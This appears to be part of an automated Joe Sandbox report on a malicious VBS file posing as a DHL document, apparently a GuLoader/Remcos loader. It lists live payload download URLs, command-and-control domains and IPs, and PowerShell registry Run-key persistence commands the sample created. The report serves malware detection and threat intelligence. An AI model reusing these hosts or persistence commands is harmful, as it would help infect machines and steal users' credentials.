            http://87.121.105.163/PUzAKuQ35.bin0%Avira URL Cloudsafe
            http://87.121.105.163/Detentionen.javaXRwl40%Avira URL Cloudsafe
            http://www.imvu.comata0%Avira URL Cloudsafe
            http://crl.mM50%Avira URL Cloudsafe
            http://87.121.105.163/Detentionen.java0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            jgbours284hawara01.duckdns.org
            		45.88.90.110
            		truetrueunknown
            www.387mfyr.sbs
            		137.220.252.40
            		truefalse
              		unknown
              led-svitidla.eu
              		37.235.104.9
              		truefalse
                		unknown
                europrotectie.ro
                		188.212.111.134
                		truefalseunknown
                geoplugin.net
                		178.237.33.50
                		truefalseunknown
                duelvalenza.it
                		46.254.34.12
                		truefalseunknown
                www.duelvalenza.it
                		unknown
                		unknowntrueunknown
                www.led-svitidla.eu
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://duelvalenza.it/FIPWKWOaFXJGe178.binfalse
                  • Avira URL Cloud: safe
                  		unknown
                  jgbours284hawara01.duckdns.orgtrue
                  • 7%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown
                  http://www.duelvalenza.it/FIPWKWOaFXJGe178.binfalse
                  • 3%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://europrotectie.ro/Methink1.thnfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://geoplugin.net/json.gptrue
                  • URL Reputation: phishing
                  		unknown
                  http://87.121.105.163/PUzAKuQ35.binfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.387mfyr.sbs/abt9/?Uzgp=d6Th&InLTkv7P=nO9f1eGtjr/sKzmKQQI1Gqn0vyk6T1iYdf0G+pz4r/6P+DB2OQ61Wxj49dZSRaju4ptYBpim6kquuDHdOrdtO4lYB4JWeqCW78ZirT3u+fANwUiQR/vajzHJfJfY/KmwIA==false
                  • Avira URL Cloud: safe
                  		unknown
                  http://87.121.105.163/Detentionen.javafalse
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2692569252.00000214A36AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2461742751.0000000005BB6000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://www.imvu.comrwab.exe, 00000008.00000002.3327352353.00000000222B0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://geoplugin.net/json.gpfwab.exe, 00000008.00000003.2493965045.000000002247C000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.2457149588.0000000004CA8000.00000004.00000800.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    • URL Reputation: malware
                    		unknown
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.2457149588.0000000004CA8000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://go.micropowershell.exe, 00000002.00000002.2568004154.0000021494A34000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://aka.ms/pscore6lBcqpowershell.exe, 00000005.00000002.2457149588.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3202569251.00000000049A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2824348491.00000000049D1000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://crl.microDpowershell.exe, 00000005.00000002.2469252560.000000000758E000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contoso.com/Licensepowershell.exe, 00000005.00000002.2461742751.0000000005BB6000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.imvu.comwab.exe, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000014.00000002.2517724529.000000000380D000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://contoso.com/Iconpowershell.exe, 00000005.00000002.2461742751.0000000005BB6000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://87.121.105.163powershell.exe, 0000000E.00000002.3202569251.0000000004FCF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3202569251.0000000004AF7000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 18%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.nirsoft.netwab.exe, 00000010.00000002.2533483224.0000000002EB4000.00000004.00000010.00020000.00000000.sdmpfalse
                            		high
                            https://duelvalenza.it/FIPWKWOaFXJGe178.binLagdsWaheuroprotectie.ro/FIPWKWOaFXJGe178.binwab.exe, 00000008.00000002.3312967278.0000000021D50000.00000004.00001000.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://europrotectie.ropowershell.exe, 00000002.00000002.2568004154.000002149582A000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://europrotectie.ro/Methink1.thnXRwlpowershell.exe, 00000005.00000002.2457149588.0000000004CA8000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://geoplugin.net/json.gp0B8wab.exe, 00000008.00000002.3295624818.00000000064AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537135847.00000000064AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2493992487.00000000064AF000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.2457149588.0000000004CA8000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comwab.exe, 00000008.00000002.3327352353.00000000222B0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://duelvalenza.it/wab.exe, 00000008.00000003.2493992487.000000000647C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537135847.000000000647C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmpfalse
                              • 3%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              https://duelvalenza.it/FIPWKWOaFXJGe178.binq(wab.exe, 00000008.00000002.3295424016.000000000643F000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.google.comwab.exe, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                		high
                                http://87.121.108powershell.exe, 0000000E.00000002.3202569251.0000000004FCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		low
                                https://europrotectie.ropowershell.exe, 00000002.00000002.2568004154.0000021493866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2568004154.0000021495668000.00000004.00000800.00020000.00000000.sdmpfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                http://87.121.105.163/Detentionen.javaXRwlpowershell.exe, 0000000E.00000002.3202569251.0000000004AF7000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://crl.micropowershell.exe, 0000000E.00000002.3263668974.0000000007340000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://geoplugin.net/json.gp)Bwab.exe, 00000008.00000002.3295624818.00000000064AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537135847.00000000064AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2493992487.00000000064AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://europrotectie.ro/Methink1.thnPpowershell.exe, 00000002.00000002.2568004154.0000021493866000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://contoso.com/powershell.exe, 00000005.00000002.2461742751.0000000005BB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2692569252.00000214A36AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2461742751.0000000005BB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.google.com/accounts/serviceloginwab.exefalse
                                    		high
                                    https://login.yahoo.com/config/loginwab.exefalse
                                      		high
                                      http://87.121.105.163/Detentionen.javaXRwl4powershell.exe, 00000016.00000002.2824348491.0000000004B27000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://aka.ms/pscore68powershell.exe, 00000002.00000002.2568004154.0000021493641000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.nirsoft.net/wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                          		high
                                          http://www.imvu.comatawab.exe, 00000014.00000002.2517724529.000000000380D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://crl.mM5powershell.exe, 0000000E.00000002.3192791124.0000000000D6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2568004154.0000021493641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2457149588.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3202569251.00000000049A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2824348491.00000000049D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://crl.vpowershell.exe, 00000002.00000002.2707049436.00000214ABB20000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.ebuddy.comwab.exe, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            188.212.111.134
                                            		europrotectie.roRomania
                                            		48881DATA-NODE-ASROfalse
                                            137.220.252.40
                                            		www.387mfyr.sbsSingapore
                                            		64050BCPL-SGBGPNETGlobalASNSGfalse
                                            87.121.105.163
                                            		unknownBulgaria
                                            		43561NET1-ASBGfalse
                                            178.237.33.50
                                            		geoplugin.netNetherlands
                                            		8455ATOM86-ASATOM86NLfalse
                                            45.88.90.110
                                            		jgbours284hawara01.duckdns.orgBulgaria
                                            		10753LVLT-10753UStrue
                                            46.254.34.12
                                            		duelvalenza.itItaly
                                            		52030SERVERPLAN-ASITfalse

                                            General Information

                                            Joe Sandbox version:40.0.0 Tourmaline
                                            Analysis ID:1431984
                                            Start date and time:2024-04-26 07:39:06 +02:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 11m 34s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:34
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:2
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:DHL_ES567436735845755676678877988975877.vbs
                                            Detection:MAL
                                            Classification:mal100.phis.troj.spyw.expl.evad.winVBS@54/18@7/6
                                            EGA Information:
                                            • Successful, ratio: 62.5%
                                            HCA Information:
                                            • Successful, ratio: 96%
                                            • Number of executed functions: 228
                                            • Number of non-executed functions: 212
                                            Cookbook Comments:
                                            • Found application associated with file extension: .vbs

                                            Warnings

                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target powershell.exe, PID 2132 because it is empty
                                            • Execution Graph export aborted for target powershell.exe, PID 2668 because it is empty
                                            • Execution Graph export aborted for target powershell.exe, PID 5804 because it is empty
                                            • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                            • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                            • Report size getting too big, too many NtCreateKey calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Report size getting too big, too many NtReadVirtualMemory calls found.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            07:39:53API Interceptor213x Sleep call for process: powershell.exe modified
                                            07:40:33AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Vibeka %Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)
                                            07:40:41AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Vibeka %Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)
                                            07:41:12API Interceptor266771x Sleep call for process: wab.exe modified
                                            07:41:15AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run bynkefugls %Deciduate% -w 1 $Xdiv=(Get-ItemProperty -Path 'HKCU:\Clouters\').Slapperne;%Deciduate% ($Xdiv)
                                            07:41:24AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run bynkefugls %Deciduate% -w 1 $Xdiv=(Get-ItemProperty -Path 'HKCU:\Clouters\').Slapperne;%Deciduate% ($Xdiv)
                                            07:41:37AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run DJNLOJ3PER C:\Program Files (x86)\windows mail\wab.exe
                                            07:41:46AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run DJNLOJ3PER C:\Program Files (x86)\windows mail\wab.exe

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            137.220.252.40BM-FM_NR.24040718PDF.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                            • www.387mfyr.sbs/8cgp/
                                            87.121.105.163PO_La-Tanerie04180240124.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                            • 87.121.105.163/YSnpkrCwWalJFSpN146.bin
                                            FTG_PD_04024024001.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                            • 87.121.105.163/EYioOXUtWs45.bin
                                            Doc_004024024001.batGet hashmaliciousFormBook, GuLoaderBrowse
                                            • 87.121.105.163/TjtonPwEiP175.bin
                                            Ordine_doc_419024001904.wsfGet hashmaliciousFormBook, GuLoaderBrowse
                                            • 87.121.105.163/icjFpYDkBweqyeZ252.bin
                                            PO_La-Tanerie04180240124.batGet hashmaliciousFormBook, GuLoaderBrowse
                                            • 87.121.105.163/vhhJQWfiJN142.bin
                                            Pedido02304024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                            • 87.121.105.163/fBizb192.bin
                                            BRUFEN ORDER VAC442_7467247728478134247.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                            • 87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin
                                            SCMP_#U547d#U4ee4_004020024001.wsfGet hashmaliciousUnknownBrowse
                                            • 87.121.105.163/Assumes122.java
                                            PO_La-Tannerie04190240419.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                            • 87.121.105.163/kvRPYpXycVNsTooeadG247.bin
                                            HTMCDevalueringstidspunkts2024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                            • 87.121.105.163/dFQwNyOh122.bin
                                            178.237.33.50SHEOrder-10524.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                            • geoplugin.net/json.gp
                                            lmg1_Mlakaifa443456.vbsGet hashmaliciousAsyncRAT, DcRat, RemcosBrowse
                                            • geoplugin.net/json.gp
                                            UrgenteNotificationRef.cmdGet hashmaliciousRemcosBrowse
                                            • geoplugin.net/json.gp
                                            107. PN-EN-1090-2+A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
                                            • geoplugin.net/json.gp
                                            URGENTE_NOTIFICATION.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                            • geoplugin.net/json.gp
                                            OKhCyJ619J.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                            • geoplugin.net/json.gp
                                            fu56fbrtn8.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                            • geoplugin.net/json.gp
                                            1713934625194381993b7036c2f81df0c4f94527f4e7bb43abdf90d09e24f7ee13cf33c8d8678.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                            • geoplugin.net/json.gp
                                            #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeGet hashmaliciousGuLoader, RemcosBrowse
                                            • geoplugin.net/json.gp
                                            TcnD64eVFK.exeGet hashmaliciousRemcosBrowse
                                            • geoplugin.net/json.gp

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            jgbours284hawara01.duckdns.orgBRUFEN ORDER VAC442_7467247728478134247.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                            • 45.88.90.110
                                            HTMCDevalueringstidspunkts2024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                            • 45.88.90.110
                                            rOferta_SKGNMECLemnedefinitionen353523577.wsfGet hashmaliciousGuLoader, RemcosBrowse
                                            • 45.88.90.110
                                            PonudaSKMTBH365756867868855766786686.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                            • 45.88.90.110
                                            geoplugin.netSHEOrder-10524.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                            • 178.237.33.50
                                            lmg1_Mlakaifa443456.vbsGet hashmaliciousAsyncRAT, DcRat, RemcosBrowse
                                            • 178.237.33.50
                                            UrgenteNotificationRef.cmdGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            107. PN-EN-1090-2+A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
                                            • 178.237.33.50
                                            URGENTE_NOTIFICATION.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                            • 178.237.33.50
                                            OKhCyJ619J.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                            • 178.237.33.50
                                            fu56fbrtn8.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                            • 178.237.33.50
                                            1713934625194381993b7036c2f81df0c4f94527f4e7bb43abdf90d09e24f7ee13cf33c8d8678.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeGet hashmaliciousGuLoader, RemcosBrowse
                                            • 178.237.33.50
                                            HFiHWvPsvA.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                            • 178.237.33.50
                                            www.387mfyr.sbsBM-FM_NR.24040718PDF.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                            • 137.220.252.40

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            NET1-ASBGxtnhsVjQTxvH.exeGet hashmaliciousQuasarBrowse
                                            • 94.156.79.26
                                            o4883TEQGB.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 94.156.8.9
                                            Id2uxwyyf8.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 94.156.8.9
                                            Y4pblBbDQc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 94.156.8.9
                                            C5fMgX1ZyY.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 94.156.8.9
                                            6fV4tfoJp2.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 94.156.8.9
                                            fqEpqMWF6r.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 94.156.8.9
                                            D0dhEeGfv4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 94.156.8.9
                                            IrnO5ZI3En.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 94.156.8.9
                                            PO_La-Tanerie04180240124.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                            • 94.156.79.69
                                            DATA-NODE-ASROV#U00e1ltson #U00e1t inform#U00e1ci#U00f3s licencszerz#U0151d#U00e9s.xlsx.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                            • 89.42.11.97
                                            dodatkowe (03).docx.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                            • 89.42.11.97
                                            Ring_Disconnection.htmlGet hashmaliciousUnknownBrowse
                                            • 93.115.112.35
                                            http://www.baidu.com/link?url=cj64feVNDBpRfz-mWLvZyoD-Z975caejUXAB-zRmXJJCRIrYzd2uBSRtciUzvyQ9&wd=&eqid=e4971210004152ab00000006651c2a40&c=E,1,LF6B09aUzKg1wcnshOUlAoOY0_15zByrDikg6zpw_Ds0VFdFc-FWIKLax27SZlNQQjZsCOQdi6Zu3-fKHRExOfYoL59_lq0WgTr4WGwZ1IE,&typo=1Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                            • 93.115.118.124
                                            Quote - TEZI 19 092 - Oriental Logistics Group - 28 - 02 - 23 - Rev 05_xls ( 67 KB).exeGet hashmaliciousAgentTeslaBrowse
                                            • 93.115.119.216
                                            4Fx7kEvh9B.exeGet hashmaliciousAgentTeslaBrowse
                                            • 93.115.112.35
                                            210909836-042205.exeGet hashmaliciousAgentTeslaBrowse
                                            • 93.115.119.216
                                            GPqF0RM2yAGet hashmaliciousMiraiBrowse
                                            • 46.102.144.156
                                            UW0Lx1YV5l.exeGet hashmaliciousRaccoon SmokeLoaderBrowse
                                            • 93.115.119.34
                                            DHL0011739892020PDF.exeGet hashmaliciousAgentTeslaBrowse
                                            • 93.115.114.26
                                            LVLT-10753USp4mKFzvOgW.elfGet hashmaliciousMirai, OkiruBrowse
                                            • 45.88.90.30
                                            B26Gx0Pptn.elfGet hashmaliciousMirai, OkiruBrowse
                                            • 45.88.90.30
                                            e9NxPUbA9r.elfGet hashmaliciousMirai, OkiruBrowse
                                            • 45.88.90.30
                                            hMVZU5z8i5.elfGet hashmaliciousMirai, OkiruBrowse
                                            • 45.88.90.30
                                            10uTWs4uLu.elfGet hashmaliciousMirai, OkiruBrowse
                                            • 45.88.90.30
                                            o0F6BWO22J.elfGet hashmaliciousMirai, OkiruBrowse
                                            • 45.88.90.30
                                            V06ANR64H4.elfGet hashmaliciousMirai, OkiruBrowse
                                            • 45.88.90.30
                                            nLGuZwgIuX.elfGet hashmaliciousMirai, OkiruBrowse
                                            • 45.88.90.30
                                            BRUFEN ORDER VAC442_7467247728478134247.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                            • 45.88.90.110
                                            https://ipv6.45-88-90-136.cprapid.com/Get hashmaliciousPayPal PhisherBrowse
                                            • 45.88.90.136
                                            ATOM86-ASATOM86NLSHEOrder-10524.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                            • 178.237.33.50
                                            lmg1_Mlakaifa443456.vbsGet hashmaliciousAsyncRAT, DcRat, RemcosBrowse
                                            • 178.237.33.50
                                            UrgenteNotificationRef.cmdGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            107. PN-EN-1090-2+A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
                                            • 178.237.33.50
                                            URGENTE_NOTIFICATION.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                            • 178.237.33.50
                                            OKhCyJ619J.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                            • 178.237.33.50
                                            fu56fbrtn8.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                            • 178.237.33.50
                                            1713934625194381993b7036c2f81df0c4f94527f4e7bb43abdf90d09e24f7ee13cf33c8d8678.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeGet hashmaliciousGuLoader, RemcosBrowse
                                            • 178.237.33.50
                                            TcnD64eVFK.exeGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            BCPL-SGBGPNETGlobalASNSGhttps://yucity.com/Get hashmaliciousUnknownBrowse
                                            • 118.107.57.100
                                            https://heiqi.xyz/Get hashmaliciousUnknownBrowse
                                            • 118.107.57.100
                                            BM-FM_NR.24040718PDF.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                            • 137.220.252.40
                                            PO_PDF24172024.scr.exeGet hashmaliciousFormBookBrowse
                                            • 134.122.178.172
                                            rFV23+17555.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                            • 134.122.178.173
                                            SecuriteInfo.com.FileRepMalware.1008.15763.exeGet hashmaliciousUnknownBrowse
                                            • 1.32.247.27
                                            RFQ.exeGet hashmaliciousFormBookBrowse
                                            • 134.122.178.172
                                            fedex awb &Invoice.vbsGet hashmaliciousFormBookBrowse
                                            • 134.122.178.171
                                            https://euet-ss.xyz/Login/register/Lang/en-usGet hashmaliciousUnknownBrowse
                                            • 216.83.40.249
                                            https://smbc-waz12.shop/Get hashmaliciousUnknownBrowse
                                            • 134.122.188.167

                                            JA3 Fingerprints

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            3b5074b1b5d032e5620f69f9f700ff0ePO-inv-CQV20(92315).exeGet hashmaliciousAgentTeslaBrowse
                                            • 188.212.111.134
                                            a.cmdGet hashmaliciousUnknownBrowse
                                            • 188.212.111.134
                                            http://papajoeschicago.comGet hashmaliciousUnknownBrowse
                                            • 188.212.111.134
                                            https://www.bing.com/ck/a?!&&p=8c604c2d3901cb1eJmltdHM9MTcxMjc5MzYwMCZpZ3VpZD0wODdjNjgyYy00N2ZlLTYyOGQtMzA1ZC03YmVmNDY5NTYzNjUmaW5zaWQ9NTE2MQ&ptn=3&ver=2&hsh=3&fclid=087c682c-47fe-628d-305d-7bef46956365&u=a1aHR0cHM6Ly9rZWljb3NlY3VyaXR5LmNvbS5teC8&ntb=1Get hashmaliciousUnknownBrowse
                                            • 188.212.111.134
                                            o3KyzpE7F4.ps1Get hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 188.212.111.134
                                            https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==Get hashmaliciousHTMLPhisherBrowse
                                            • 188.212.111.134
                                            http://wsj.pmGet hashmaliciousNetSupport RATBrowse
                                            • 188.212.111.134
                                            Isass.exeGet hashmaliciousUnknownBrowse
                                            • 188.212.111.134
                                            https://itniy4gbb.cc.rs6.net/tn.jsp?f=001DpCT81a7BIE926OduG6KmKkwKebSAbUZq28C52DoY-FfQJyM_2Gq3l18V1j7KWwJQTfGlQ_HSq0vC8xqJqFST9z0CwmpWgUieBjKckdJcSODJ_3vu5MzvaSoOGbGY9SjpWQtg9-aAXm1e6VV91z84Q2_wlyDMR98&c=i37ZFF5Dy2QSFqOfb2TVpr5vkMFqaR6DdoQbIhzcRV7G2oFwX8NEvA==&ch=2ErEiCYnoykaXa1uoD0AgTD1vOpSqc6zh3ef32Gb4XR_ut8_qvmzHA==&c=&ch=&__=/mrlZp0zmTKgGvsPpx0JUyCMjGZr4J6/Z2dvbnphbGV6c2FsYXNAc2FuaXRhcy5lcw==Get hashmaliciousHTMLPhisherBrowse
                                            • 188.212.111.134
                                            SecuriteInfo.com.Win32.PWSX-gen.18376.4403.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 188.212.111.134
                                            37f463bf4616ecd445d4a1937da06e19ad.msiGet hashmaliciousLatrodectusBrowse
                                            • 46.254.34.12
